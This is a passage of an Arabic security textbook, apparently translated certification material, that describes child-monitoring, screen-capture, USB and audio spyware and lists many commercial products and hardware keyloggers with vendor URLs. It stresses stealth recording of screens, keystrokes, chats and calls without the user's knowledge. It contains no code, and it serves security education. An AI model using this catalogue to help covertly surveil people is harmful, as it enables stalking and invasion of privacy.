‫‪ Child monitoring spyware‬ﺗﺳﺟل ﺟﻣﯾﻊ أﻧﺷطﺔ طﻔﻠك ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر وﯾوﻓر ﻟﮭم إﻣﺎ ﻓﻲ ﻣﻠف ﻣﺧﻔﻲ ﻣﺷﻔرة أو ﯾرﺳل إﻟﻰ ﻋﻧوان‬
‫اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد‪ .‬ﻛﻣﺎ ﯾﺳﺟل اﻟوﻗت اﻟذي ﺗم ﻓﺗﺢ اﻟﺗطﺑﯾﻘﺎت ﻓﯾﮫ‪ ،‬ﻣﻘدار اﻟوﻗت اﻟذي ﯾﻧﻔﻖ ﻋﻠﻰ اﻹﻧﺗرﻧت أو اﻟﻛﻣﺑﯾوﺗر‪ ،‬ﻣﺎ ﯾﻔﻌﻠوﻧﮫ ﻋﻠﻰ‬
‫اﻟﻛﻣﺑﯾوﺗر‪ ،‬وھﻠم ﺟرا‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪419‬‬

‫‪Child Monitoring Spyware: Net Nanny Home Suite‬‬


‫اﻟﻣﺻدر‪http://www.netnanny.com :‬‬
‫‪ Net Nanny's parental control software‬ﻣﻊ أدوات اﻟﺣﻣﺎﯾﺔ ﻓﻲ اﻹﻧﺗرﻧت ﯾﺳﻣﺢ ﻟك ﻟﺣﻣﺎﯾﺔ اﻟطﻔل ﻋﻠﻰ اﻹﻧﺗرﻧت ﻣن ﻣﺣﺗوى ﻏﯾر‬
‫ﻻﺋﻖ‪ ،‬واﻟﻣواد اﻹﺑﺎﺣﯾﺔ‪ ،‬واﻟﻣﺣﺗوﯾﺎت اﻟﺧﻠﯾﻌﺔ اﻷﺧرى‪ .‬ھو ﻋﺑﺎره ﻋن ﻓﻠﺗر واﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺎﻟﺣﻔﺎظ ﻋﻠﻰ اﺳﺗﺧدام اﻻﻧﺗرﻧت اﻟﻣﻧزﻟﻲ ﻣن أي‬
‫ﻣﻛﺎن ﻓﻲ أي وﻗت ﻋن طرﯾﻖ أدوات اﻹدارة ﻋن ﺑﻌد‪ .‬ﯾﻣﻛﻧك ﺿﺑط إﻋدادات اﻟﻔﻠﺗرة وﻓﻘﺎ ﻟﻠﺗﻔﺿﯾﻼت اﻟﺷﺧﺻﯾﺔ‪ ،‬وﺗﺣﺗﺎج ﻟرﺻد ﺗﺻﻔﺢ‬
‫اﻹﻧﺗرﻧت واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ ﻣن أي ﻣﻛﺎن‪ .‬ﻓﺈﻧﮫ ﯾﻣﻛن إﻧﺷﺎء ﺗﻧﺑﯾﮭﺎت ‪IM predators‬و‪ .cyber bullies‬ﻓﺈﻧﮫ ﯾوﻓر وﺻول ﻣﺣﻣﻲ ﺑﻛﻠﻣﺔ‬
‫ﻣرور ﻟﻶﺑﺎء واﻷﻣﮭﺎت واﻟﻘﯾود اﻟﻣﺧﺻﺻﺔ ﻟﻛل ﻓرد ﻣن أﻓراد اﻷﺳرة‪ .‬ﯾﻣﻛﻧك أن ﺗرى ﺗﻘﺎرﯾر ﻋن ﻧﺷﺎط اﻹﻧﺗرﻧت أطﻔﺎﻟك وﺳﺟﻼت اﻟرﺳﺎﺋل‬
‫اﻟﻔورﯾﺔ‪.‬‬

‫‪Child Monitoring Spyware: other tools‬‬


‫ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس ﻟﻣراﻗﺑﺔ اﻟطﻔل اﻟﺗﻲ ﺗﺗوﻓر ﺑﺳﮭوﻟﺔ ﻓﻲ اﻟﺳوق‪:‬‬
‫‪Aobo Filter for PC available at http://www.aobo-porn-filter.com/‬‬
‫‪CyberSieve available at http://www.softforyou.com‬‬
‫‪Child Control available at http://www.salfeld.com‬‬
‫‪SentryPC available at http://www.sentry9c.com‬‬
‫‪Spytech SentryPC available at http://www.spytech-web.com‬‬
‫‪K9 Web Protection available at http://www1.k9webprotection.com/‬‬
‫‪Verity Parental Control Software available at http://www.nchsoftware.com‬‬
‫‪Profil Parental Filter available at http://www.graftechnology.com/‬‬
‫‪PC Pandora available at http://www.pcpandora.com/‬‬
‫‪Kidswatch available at http://www.kidswatch.com‬‬

‫‪Screen Capturing Spyware‬‬

‫‪ Screen capturing spyware‬ھﻲ ﺑراﻣﺞ اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ أﻧﺷطﺔ اﻟﻛﻣﺑﯾوﺗر أو أﺧذ ﻟﻘطﺎت ‪ screenshot‬ﻣن اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗم‬
‫ﺗﺛﺑﯾت اﻟﺑرﻧﺎﻣﺞ ﻋﻠﯾﮫ‪ .‬ھذا ﯾﺄﺧذ ﻟﻘطﺎت ﻣن اﻟﻛﻣﺑﯾوﺗر ﻣﺣﻠﻲ أو اﻟﺑﻌﯾد ﻋﻠﻰ ﻓﺗرات زﻣﻧﯾﺔ ﻣﺣددة وﯾوﻓرھم إﻣﺎ ﻋﻠﻰ اﻟﻘرص اﻟﻣﺣﻠﻲ ﻓﻲ ﻣﻠف‬
‫ﻣﺧﻔﻲ ﻟﻠﻣراﺟﻌﺔ ﻓﻲ وﻗت ﻻﺣﻖ أو ﯾرﺳﻠﮭﺎ إﻟﻰ أﺣد اﻟﻣﮭﺎﺟﻣﯾن ﻣن ﺧﻼل ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ أو ‪ FTP‬اﻟﻣﺣدد ﻣﺳﺑﻘﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪420‬‬

‫‪ Screen capturing spyware‬ﻟﯾس ﻓﻘط ﻗﺎدرا ً ﻋﻠﻰ اﻟﺗﻘﺎط ﻟﻘطﺎت وﻟﻛن أﯾﺿﺎ ﯾﻠﺗﻘط ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬ﻧﺷﺎط اﻟﻣﺎوس ‪ ،‬ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ‬
‫ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪ ،‬وأﻧﺷطﺔ اﻟطﺎﺑﻌﺔ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪ .‬ﯾﻣﻛن ﺗﺛﺑﯾت ھذا اﻟﺑرﻧﺎﻣﺞ أو اﻟﺑراﻣﺞ ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر‬
‫اﻟﻣﺗﺻﻠﺔ ﺑﺎﻟﺷﺑﻛﺔ ﻟرﺻد أﻧﺷطﺔ ﺟﻣﯾﻊ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ ﻣن ﺧﻼل أﺧذ ﻟﻘطﺎت اﻟﺷﺎﺷﺔ‪ .‬ھذا ﯾﻌﻣل ﻓﻲ وﺿﻊ‬
‫اﻟﺷﺑﺢ )‪ (stealth mode‬ﺣﺗﻰ ﺗﺗﻣﻛن ﻣن رﺻد أﻧﺷطﺔ أي ﺷﺧص ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر دون ﻋﻠﻣﮭم‪.‬‬
‫ﻣﻊ ھذه اﻟﺑراﻣﺞ‪ ،‬ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻣراﻗﺑﺔ ﻛﻣﺑﯾوﺗر وﺗﺣدﯾد أﻧﺷطﺔ اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻷﻧﮭﺎ ﺗﺑﺣث ﻓﻲ اﻟﻛﻣﺑﯾوﺗر)‪ .(live‬ﯾدار ھذا‬
‫اﻟﺑرﻧﺎﻣﺞ ﺑﺷﻔﺎﻓﯾﺔ ﻓﻲ اﻟﺧﻠﻔﯾﺔ‪ .‬ﻓﺈﻧﮫ ﯾﺄﺧذ ﻟﻘطﺎت ﻟﻛل ﺗطﺑﯾﻖ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺗم ﻓﺗﺣﮫ ﺑﺣﯾث ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدﻣﯾن اﻟﺗﻌرف ﻋﻠﻰ ﻛل ﻋﻣل ﻋﻠﻰ‬
‫اﻟﻛﻣﺑﯾوﺗر ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪.‬‬
‫‪Screen Capturing Spyware: SoftActivity TS Monitor‬‬
‫اﻟﻣﺻدر‪http://www.softactivity.com :‬‬
‫‪ SoftActivity TS Monitor‬ھو ‪ terminal-server sessions‬واﻟذى ﯾﺳﺟل ﻟﻘطﺎت ﻟﻛل ﻋﻣل اﻟﻣﺳﺗﺧدم‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ‬
‫أﻧﺷطﺔ اﻟﻣﺳﺗﺧدم اﻟﺑﻌﯾد ﻋﻠﻰ ﻣﻠﻘم اﻟﺗرﻣﻧﺎل )‪ (Windows terminal server‬اﻟﺧﺎص ﺑك وﻣراﻗﺑﺔ ﻣوظﻔﯾك اﻟذﯾن ﯾﻌﻣﻠون ﻣن اﻟﻣﻧزل أو‬
‫اﻟﻣﻧﺎطﻖ ﻋن ﺑﻌد او ﻣن ﺧﻼل رﺣﻼت اﻟﻌﻣل ﻋﺑر ‪ .RDP‬ھذا ﯾﻣﻛن أﯾﺿﺎ ﻣراﻗﺑﺔ ﻣﺎ ﯾﻔﻌﻠﮫ اﻟﻣﺳﺗﺧدﻣون ﻋﻠﻰ ﺷﺑﻛﺔ اﻟﻌﻣﯾل‪ ،‬دون ﺗرﻛﯾب أي‬
‫ﺑرﻧﺎﻣﺞ ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﺗﺻﺎل‪ .‬ﯾﻣﻛﻧﮫ أﯾﺿﺎ ﺗوﺛﯾﻖ اﻟﺗﻐﯾرات ﻋﻠﻰ إﻋداد اﻟﺧوادم ﻋن طرﯾﻖ ﺗﺳﺟﯾل اﻟﺟﻠﺳﺎت اﻹدارﯾﺔ اﻟﺑﻌﯾدة واﻟﻣﺣﻠﯾﺔ‪ .‬ﯾﻣﻛن‬
‫أﯾﺿﺎ ﺗﺄﻣﯾن ﺑﯾﺎﻧﺎت اﻟﺷرﻛﺎت ﻋن طرﯾﻖ ﻣﻧﻊ ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت ﻣن ﻗﺑل اﻟﻣطﻠﻌﯾن‪ .‬زﯾﺎدة إﻧﺗﺎﺟﯾﺔ اﻟﻣوظﻔﯾن وﺗﺣﺳﯾن اﻷﻣن‪ .‬ھذا ‪terminal‬‬
‫‪ server monitoring software‬ﺗﻛون ﻏﯾر ﻣرﺋﯾﺔ ﺗﻣﺎﻣﺎ ﻟﻠﻣﺳﺗﺧدﻣﯾن‪.‬‬

‫‪Screen Capturing Spyware: Other tools‬‬

‫‪ Screen capturing spyware‬ھو اﻟﺑرﻧﺎﻣﺞ اﻟذي ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ أﻧﺷطﺔ اﻟﻛﻣﺑﯾوﺗر ﻟطﻔﻠك أو اﻟﻌﺎﻣﻠﯾن ﺑﮭﺎ أو أﺧذ ﻟﻘطﺎت‬
‫‪ Screenshot‬ﻟﻠﻛل وﻟﻛل ﺗطﺑﯾﻖ ﺗم ﻓﺗﺣﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺛﺑت ﻋﻠﯾﮫ اﻟﺑرﻧﺎﻣﺞ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ‪Screen capturing‬‬
‫‪ spyware‬ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Desktop Spy available at http://www.spyarsenal.com‬‬
‫‪IcyScreen available at http://www.16software.com‬‬
‫‪Spector Pro available at http://www.spectorsoft.com‬‬
‫‪PC Tattletale available at http://www.pctattletale.com‬‬
‫‪Computer Screen Spy Monitor available at http://www.mysuperspy.com‬‬
‫‪PC Screen Spy Monitor available at http://ematrixsoft.com‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪421‬‬

‫‪Kahlown Screen Spy Monitor available at http://www.lesoftrejion.com‬‬


‫‪Guardbay Remote Computer Monitoring Software available at http://www.guardbay.com‬‬
‫‪HT Employee Monitor available at http://www.hidetools.com‬‬
‫‪Spy Employee Monitor available at http://www.spysw.com‬‬
‫‪USB Spyware‬‬

‫‪ USB spyware‬ھو ﺑرﻧﺎﻣﺞ أو ﺑرﻣﺟﯾﺎت ﻣﺻﻣﻣﺔ ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر و ﺗﺧﻔﻰ ﻓﻲ ﺟﮭﺎز ‪ USB spyware. USB‬ﯾﻧﺳﺦ ﻣﻠﻔﺎت‬
‫اﻟﺗﺟﺳس ﻣن أﺟﮭزة ‪ USB‬إﻟﻰ اﻟﻘرص اﻟﺛﺎﺑت دون أي طﻠب أو إﻋﻼم‪ .‬ھذا ﯾﻌﻣل ﺑطرﯾﻘﺔ ﺧﻔﯾﺔ وﺑﺎﻟﺗﺎﻟﻲ ﻓﺈن ﻣﺳﺗﺧدﻣﻲ اﻟﻛﻣﺑﯾوﺗر ﻻ ﯾﻛون ﻋﻠﻰ‬
‫ﺑﯾﻧﺔ ﻣن وﺟود ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮭم‪.‬‬
‫ﯾوﻓر‪ USB spyware‬ﺣﻠول ﻣﺗﻌدد اﻷوﺟﮫ ﻓﻲ ﻣﺣﺎﻓظ اﺗﺻﺎﻻت‪ USB spyware. USB‬ﻗﺎدر ﻋﻠﻰ رﺻد ﻧﺷﺎط أﺟﮭزة ‪ USB‬دون إﻧﺷﺎء‬
‫ﻓﻼﺗر إﺿﺎﻓﯾﺔ أو اﺟﮭزه )‪ (device‬و ﻏﯾرھﺎ‪ ،‬واﻟﺗﻲ ﻗد ﺗﺿر ﺑﮭﯾﻛل اﻟﻧظﺎم‪.‬‬
‫‪ USB spyware‬ﯾﺗﯾﺢ ﻟك اﻟﺗﻘﺎط وﻋرض وﺗﺳﺟﯾل و ﺗﺣﻠﯾل اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم ﻧﻘﻠﮭﺎ ﺑﯾن أي ﺟﮭﺎز ‪ USB‬ﻣﺗﺻﻼ ﺑﺟﮭﺎز ﻛﻣﺑﯾوﺗر واﻟﺗطﺑﯾﻘﺎت‪.‬‬
‫وھذا ﯾﺗﯾﺢ اﻟﻌﻣل ﻋﻠﻰ ﺗطوﯾر ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل اﻟﺟﮭﺎز أو اﻷﺟﮭزة‪ ،‬واﻟذي ﯾوﻓر ﻣﻧﺻﺔ ﻗوﯾﺔ ﻟﻠﻛود اﻟﻔﻌﺎل واﻻﺧﺗﺑﺎر واﻟﺗﺣﺳﯾن وﯾﺟﻌﻠﮭﺎ أداة‬
‫ﻋظﯾﻣﺔ ﻟﺗﺻﺣﯾﺢ أﺧطﺎء اﻟﺑرﻣﺟﯾﺎت‪.‬‬
‫ﻓﺈﻧﮫ ﯾﻠﺗﻘط ﺟﻣﯾﻊ اﻻﺗﺻﺎﻻت ﺑﯾن ﺟﮭﺎز ‪ USB‬وﻣﺿﯾﻔﮫ وﺣﻔظﮭﺎ ﻓﻲ ﻣﻠف ﻣﺧﻔﻲ ﻟﻠﻣراﺟﻌﺔ ﻓﻲ وﻗت ﻻﺣﻖ‪ .‬ﯾﻌرض ﺳﺟل ﺗﻔﺻﯾﻠﻲ ﻣﻠﺧﺻﺎ ﻟﻛل‬
‫ﻣﻌﺎﻣﻼت اﻟﺑﯾﺎﻧﺎت ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ ﻣﻌﻠوﻣﺎت اﻟدﻋم‪ .‬ﯾﺳﺗﺧدم ‪ USB spyware‬ﻗﻠﯾﻼ ﻣن ﻣوارد اﻟﻧظﺎم ﻣن اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺿﯾف‪ .‬ھذا ﯾﻌﻣل ﻣﻊ‬
‫اﻟطﺎﺑﻊ اﻟزﻣﻧﻲ اﻟﺧﺎﺻﺔ ﺑﮫ ﻟﺗﺳﺟﯾل ﺟﻣﯾﻊ اﻷﻧﺷطﺔ ﻓﻲ ﺗﺳﻠﺳل اﻻﺗﺻﺎﻻت‪.‬‬
‫‪ USB spyware‬ﻻ ﯾﺣﺗوي ﻋﻠﻰ ‪ adware‬أو ‪ .spyware‬وھﻲ ﺗﻌﻣل ﻣﻊ ﻣﻌظم اﻻﺻدارات اﻷﺧﯾرة ﻣن اﻟوﯾﻧدوز‪.‬‬
‫‪ USB spyware -‬ﯾﻧﺳﺦ اﻟﻣﻠﻔﺎت ﻣن أﺟﮭزة ‪ USB‬إﻟﻰ اﻟﻘرص اﻟﺛﺎﺑت ﻓﻲ ﺧﻔﯾﺔ ﻣن دون أي طﻠب‪.‬‬
‫‪ -‬ﯾﻘوم ﺑﺈﻧﺷﺎء ﻣﻠف ﻣﺧﻔﻲ‪/‬ﻣﺟﻠد ﻣﻊ اﻟﺗﺎرﯾﺦ اﻟﺣﺎﻟﻲ واﻟﺑدا ﻣن ﻋﻣﻠﯾﺔ اﻟﻧﺳﺦ اﻟﺧﻠﻔﻲ )‪.(background copies‬‬
‫‪ -‬ﺗﺗﯾﺢ ﻟك اﻟﺗﻘﺎط وﻋرض وﺗﺳﺟﯾل وﺗﺣﻠﯾل اﻟﺑﯾﺎﻧﺎت اﻟﻣﻧﻘوﻟﺔ ﺑﯾن أي ﺟﮭﺎز ‪ USB‬ﻣﺗﺻﻼ ﺑﺟﮭﺎز ﻛﻣﺑﯾوﺗر واﻟﺗطﺑﯾﻘﺎت‪.‬‬
‫‪USB Spyware: USBSpy‬‬
‫اﻟﻣﺻدر‪http://www.everstrike.com :‬‬
‫‪ USBSpy‬ﺗﻣﻛﻧك ﻣن اﻟﺗﻘﺎط وﻋرض وﺗﺳﺟﯾل وﺗﺣﻠﯾل اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم ﻧﻘﻠﮭﺎ ﺑﯾن أي ﺟﮭﺎز ‪ USB‬ﻣﺗﺻﻼ ﺑﺟﮭﺎز ﻛﻣﺑﯾوﺗر واﻟﺗطﺑﯾﻘﺎت‪ .‬وھذا‬
‫ﯾﺟﻌﻠﮭﺎ أداة ﻋظﯾﻣﺔ ﻟﺗﺻﺣﯾﺢ أﺧطﺎء اﻟﺑرﻣﺟﯾﺎت‪ ،‬واﻟﻌﻣل ﻋﻠﻰ ﺗطوﯾر ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل اﻟﺟﮭﺎز أو اﻷﺟﮭزة‪ ،‬وﯾوﻓر ﻣﻧﺻﺔ ﻗوﯾﺔ ﻟﺗرﻣﯾز ﻓﻌﺎل‬
‫واﻻﺧﺗﺑﺎر واﻟﺗﺣﺳﯾن‪ .‬ﯾﺟﻌل ﺣرﻛﺔ اﻟﻣرور ‪ (USB Traffic) USB‬ﯾﻣﻛن اﻟوﺻول إﻟﯾﮭﺎ ﺑﺳﮭوﻟﺔ ﻷﻏراض اﻟﺗﺣﻠﯾل واﻟﺗﺻﺣﯾﺢ‪ .‬ﯾﻣﻛﻧﮫ اﻟﻔﻠﺗرة‬
‫ﺣﺗﻰ ﯾﻘدم اﻟﺑﯾﺎﻧﺎت اﻟﻣطﻠوﺑﺔ ﻓﻘط‪ .‬ذات واﺟﮭﺔ ﯾﺟﻌل ﺗﺗﺑﻊ اﻻﺗﺻﺎﻻت ﺑﺳﮭوﻟﮫ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪422‬‬

‫‪USB Spyware: Other tools‬‬


‫ﺑﻌض ﻣن ﺗطﺑﯾﻘﺎت ‪ USB Spyware‬اﻟﻣﺗوﻓر ﻓﻲ اﻟﺳوق ﻛﺎﻻﺗﻰ‪:‬‬
‫‪USB Monitor available at http://www.hhdsoftware.com‬‬
‫‪USB Grabber available at http://usbgrabber.sourceforge.net‬‬
‫‪USBTrace available at http://www.sysnucleus.com‬‬
‫‪USBDeview available at http://www.nirsoft.net‬‬
‫‪Advanced USB Port Monitor available at http://www.aggsoft.com‬‬
‫‪USB Monitor Pro available at http://www.usb-monitor.com‬‬
‫‪USB Activity Monitoring Software available at http://www.datadoctor.org‬‬
‫‪Stealth iBot Computer Spy available at http://www.brickhousesecurity.com‬‬
‫‪KeyCarbon USB Hardware Keylogger available at http://www.spywaredirect.net‬‬
‫‪USB 2GB Keylogger available at http://diij.com‬‬
‫‪Audio Spyware‬‬

‫‪ Audio spyware‬ھﻲ ﺑراﻣﺞ ﻟﻣراﻗﺑﺔ اﻟﺻوت اﻟﺗﻲ ﺗم ﺗﺻﻣﯾﻣﮭﺎ ﻻﻟﺗﻘﺎط اﻟﻣوﺟﺎت اﻟﺻوﺗﯾﺔ أو ﺻوت ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﻣﻛن ﺗﺛﺑﯾت ﺑراﻣﺞ‬
‫اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر دون اﻟﺣﺻول ﻋﻠﻰ إذن ﻣن ﻣﺳﺗﺧدم اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﺗم ﺗﺛﺑﯾت ﺑراﻣﺞ ﺗﺟﺳس اﻟﺻوت ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺑطرﯾﻘﺔ ﺻﺎﻣﺗﺔ دون‬
‫إرﺳﺎل أي إﺷﻌﺎر ﻟﻠﻣﺳﺗﺧدم وﯾﻌﻣل ﻓﻲ اﻟﺧﻠﻔﯾﺔ ﻟﺗﺳﺟﯾل ﻣﺧﺗﻠف اﻷﺻوات ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺳرا‪ .‬اﺳﺗﺧدام ﺑراﻣﺞ ﺗﺟﺳس اﻟﺻوت ﻻ ﯾﺗطﻠب أي‬
‫اﻣﺗﯾﺎزات إدارﯾﺔ‪.‬‬
‫‪ Audio spyware‬ﺗرﺻد وﺗﺳﺟل ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻷﺻوات ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﺗم ﺣﻔظ اﻷﺻوات اﻟﻣﺳﺟﻠﺔ ﻓﻲ ﻣﻠف ﻣﺧﻔﻲ ﻋﻠﻰ‬
‫اﻟﻘرص اﻟﻣﺣﻠﻲ ﻟﻼﺳﺗرداد ﻓﻲ وﻗت ﻻﺣﻖ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟﻣﯾن أو اﻟﻣﺳﺗﺧدﻣﯾن اﻟﺿﺎرﯾن ﯾﺳﺗﺧدﻣوا ﺑراﻣﺞ ﺗﺟﺳس اﻟﺻوت ھذه ﻟﻠﺗﺣري‬
‫ورﺻد ﺗﺳﺟﯾﻼت اﻟﻣﺣﺎدﺛﺔ‪ ،‬واﻟﻣﻛﺎﻟﻣﺎت اﻟﮭﺎﺗﻔﯾﺔ‪ ،‬واﻟﺑث اﻹذاﻋﻲ‪ ،‬واﻟﺗﻲ ﻗد ﺗﺣﺗوي ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺳرﯾﺔ‪.‬‬
‫‪ Audio spyware‬ﻗﺎدر ﻋﻠﻰ اﻟﺗﺳﺟﯾل واﻟﺗﺟﺳس ﻋﻠﻰ رﺳﺎﺋل اﻟدردﺷﺔ اﻟﺻوﺗﯾﺔ ﻣن ﻣﺧﺗﻠف ﺗطﺑﯾﻘﺎت اﻟدردﺷﺔ ذات اﻟﺷﻌﺑﯾﺔ‪ .‬ﻣﻊ ﺑراﻣﺞ‬
‫ﺗﺟﺳس اﻟﺻوت ھذه ﯾﻣﻛن ﻟﻠﻧﺎس ﻣﺷﺎھدة ﻣوظﻔﯾﮭﺎ أو اﻷطﻔﺎل وﻣﻌرﻓﺔ ﻣن ﯾﺗواﺻﻠوا ﻣﻌﮭم‪.‬‬
‫‪ Audio spyware‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻣراﻗﺑﺔ أﺟﮭزة اﻟﺻوت اﻟرﻗﻣﯾﺔ ﻣﺛل ﻣﺧﺗﻠف اﻟرﺳل‪ ،‬اﻟﻣﯾﻛروﻓوﻧﺎت‪ ،‬واﻟﮭواﺗف اﻟﻣﺣﻣوﻟﺔ‪ .‬ﻓﺈﻧﮫ ﯾﻣﻛن‬
‫ﺗﺳﺟﯾل اﻟﻣﺣﺎدﺛﺎت اﻟﺻوﺗﯾﺔ ﻋن طرﯾﻖ اﻟﺗﻧﺻت وﻣراﻗﺑﺔ ﺟﻣﯾﻊ اﻟﻣﻛﺎﻟﻣﺎت اﻟﺻﺎدرة ‪ ingoing‬و‪ ،‬واﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ‪ ،‬اﻟﺦ اﻧﮭﺎ ﺗﺳﻣﺢ ﻟﻠرﺻد‬
‫اﻟﻣﻛﺎﻟﻣﺔ اﻟﺣﯾﺔ‪ ،‬وﻣراﻗﺑﺔ اﻟﺻوت‪ ،‬ﻣﺳﺎر ‪ ،SMS‬ﺗﺳﺟﯾل ﺟﻣﯾﻊ اﻟﻣﻛﺎﻟﻣﺎت‪ ،‬وﺗﺗﺑﻊ ﺟﻲ ﺑﻲ آر إس‪.GPRS‬‬
‫‪Audio Spyware: Spy Voice Recorder‬‬
‫اﻟﻣﺻدر‪http://www.mysuperspy.com :‬‬
‫‪ Spy Voice Recorder‬ھو ﺑرﻧﺎﻣﺞ ﺗﺟﺳس اﻟﻛﻣﺑﯾوﺗر اﻟذي ﯾﺳﻣﺢ ﻟك ﻟرﺻد اﻟﺻوت وﺗﺳﺟﯾل اﻟﺻوت ﻋﻠﻰ اﻟﻧظﺎم‪ .‬ﻓﺈﻧﮫ ﯾﺳﺟل ﺑﺧﻔﺎء‬
‫ﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت اﻟﻣﺣرز ﻓﻲ ﺑراﻣﺞ اﻟﻣﺣﺎدﺛﺔ أو ﺑراﻣﺞ اﻟرﺳﺎﺋل اﻟﻔورﯾﺔ ذات ﺷﻌﺑﯾﺔ ﺑﻣﺎ ﻓﻲ ذﻟك أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن ﺗطﺑﯾﻘﺎت‬
‫اﻷﺣﺎدﯾث اﻟﺻوﺗﯾﺔ اﻟﻣﺗﺎﺣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﺛل ‪،Yahoo! Messenger Voice chat ،Skype Voice Chat ،MSN Voice Chat‬‬
‫‪ ،QQ Voice Chat ،ICQ Voice Chat‬اﻟﺦ‪ .‬ﯾﻣﻛن أﯾﺿﺎ ﺗﺳﺟﯾل اﻻﺻوات اﻟﻣﺗدﻓﻘﺔ اﻷﺧرى ﻣن اﻹﻧﺗرﻧت‪ ،‬وﻟﻌب اﻟﻣوﺳﯾﻘﻰ وأﺻوات‬
‫اﻟﻣﯾﻛروﻓون واﻟﺳﻣﺎﻋﺎت‪ ،‬اﻟﺦ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪423‬‬

‫‪Audio Spyware: Sound Snooper‬‬


‫اﻟﻣﺻدر‪http://www.sound-snooper.com :‬‬
